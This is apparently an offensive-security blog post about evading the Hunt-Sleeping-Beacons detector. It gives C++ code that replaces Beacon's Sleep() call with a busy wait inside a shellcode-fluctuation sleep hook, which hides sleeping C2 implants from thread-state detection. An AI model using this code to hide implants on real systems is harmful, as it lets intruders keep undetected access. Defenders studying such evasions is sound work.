Evading Hunt-Sleeping-Beacons

Reference: https://github.com/thefLink/Hunt-Sleeping-Beacons

POC repo

https://github.com/CodeXTF2/BusySleepBeacon

How does the technique work?

A well known behaviour of the Beacon payload is that it calls the Sleep() WinAPI to sleep between callbacks. A project on github, named Hunt-Sleeping-Beacons, detects sleeping Beacon payloads based on the following behaviour of Beacon:

  • The beacon payload calls Sleep() to sleep

  • the Sleep() function puts the current thread into the state "DelayExecution"

  • the callstack to Sleep() includes saved instruction pointers which cannot be mapped to a module on disk as the address is either not associated with a module on disk or the module has been modified at runtime.

According to the project repo, the detection logic is as follows:

The metric to detect this kind of malware is thus:

  1. Enumerate all Threads which state is set to: DelayExecution

  2. Analyze the callstack of the thread for suspicious memory addresses

  3. If a thread is in DelayExecution and one of the return addresses in the callstack cannot be associated with a module on disk its probably a running beacon

  4. To identify the associated module of each saved instruction pointer, I make use of SymGetModuleInfo64. This also seems to work fine against ideas such as Phantom Dll Hollowing.

How effective are current evasions?

Current implementations of sleep protection, such as Heap + Stack encryption, are unrelated to this specific behaviour of Beacon, and do not evade this project. The thread state is unaffected by heap or stack contents, and the saved instruction pointers still do not map to a module on disk.

How do we evade this?

The first way, as the repo author himself explains, is module stomping. This is probably because the saved instruction pointers can be mapped to modules on disk (since the whole point of module stomping is hollowing a legitimately loaded DLL).

However, another way I found to bypass this project (and detection technique altogether) is by evading detection of the DelayExecution thread state.

First, lets understand what the DelayExecution thread state is.

When a Windows process wants to delay execution for a certain amount of time, the thread is put into a state corresponding to the reason for the wait. The states are as follows:

enum KWAIT_REASON
{
    Executive,
    FreePage,
    PageIn,
    PoolAllocation,
    DelayExecution,
    Suspended,
    UserRequest,
    WrExecutive,
    WrFreePage,
    WrPageIn,
    WrPoolAllocation,
    WrDelayExecution,
    WrSuspended,
    WrUserRequest,
    WrEventPair,
    WrQueue,
    WrLpcReceive,
    WrLpcReply,
    WrVirtualMemory,
    WrPageOut,
    WrRendezvous,
    Spare2,
    Spare3,
    Spare4,
    Spare5,
    Spare6,
    WrKernel,
    MaximumWaitReason
};

So since this detection is based on the fact that Sleep() puts the thread into the state DelayExecution, all we need to do is make it delay for the same amount of time, without using Sleep() (or anything that causes DelayExecution).

A simple way we can do this, is a busy wait. A busy wait is simply a form of delaying code execution while keeping the CPU occupied (instead of putting the thread into a wait state). I took some busy wait code from the following post to test this theory.

#include <ctime>
bool Wait(const unsigned long &Time)
{
    clock_t Tick = clock_t(float(clock()) / float(CLOCKS_PER_SEC) * 1000.f);
    if(Tick < 0) // if clock() fails, it returns -1
        return 0;
    clock_t Now = clock_t(float(clock()) / float(CLOCKS_PER_SEC) * 1000.f);
    if(Now < 0)
        return 0;
    while( (Now - Tick) < Time )
    {
        Now = clock_t(float(clock()) / float(CLOCKS_PER_SEC) * 1000.f);
        if(Now < 0)
            return 0;
    }
    return 1;
}

Now, how do we make beacon use our busy wait instead of Sleep()?

I stole more code from Github, in this case mgeeky's ShellcodeFluctuation project. This is a standard sleep protection implementation, but what we want is the hook on Sleep() that lets us control the sleep behaviour.

I modified the following function of his project (comments omitted):

void WINAPI MySleep(DWORD dwMilliseconds)
{
    const LPVOID caller = (LPVOID)_ReturnAddress();
    initializeShellcodeFluctuation(caller);
    shellcodeEncryptDecrypt(caller);
    log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    HookTrampolineBuffers buffers = { 0 };
    buffers.originalBytes = g_hookedSleep.sleepStub;
    buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);
    fastTrampoline(false, (BYTE*)::Sleep, (void*)&MySleep, &buffers);

    // Perform sleep emulating originally hooked functionality.
    ::Sleep(dwMilliseconds);

    if (g_fluctuate == FluctuateToRW)
    {
        shellcodeEncryptDecrypt((LPVOID)caller);
    }
    else
    {
    }
    fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep);
}

This is the function that the hook redirects the code execution flow to whenever Sleep() is called. It performs its sleep protection routines and then calls Sleep() normally to sleep. We can replace this with a call to our busy wait, to make it use that instead.

void WINAPI MySleep(DWORD dwMilliseconds)
{
    const LPVOID caller = (LPVOID)_ReturnAddress();
    initializeShellcodeFluctuation(caller);
    shellcodeEncryptDecrypt(caller);
    log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    HookTrampolineBuffers buffers = { 0 };
    buffers.originalBytes = g_hookedSleep.sleepStub;
    buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);
    fastTrampoline(false, (BYTE*)::Sleep, (void*)&MySleep, &buffers);

    // Perform sleep emulating originally hooked functionality.
    Wait(dwMilliseconds);

    if (g_fluctuate == FluctuateToRW)
    {
        shellcodeEncryptDecrypt((LPVOID)caller);
    }
    else
    {
    }
    fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep);
}

Lets test this evasion!

Default beacon:

With busy wait:

Hunt-Sleeping-Beacons evaded!

Last updated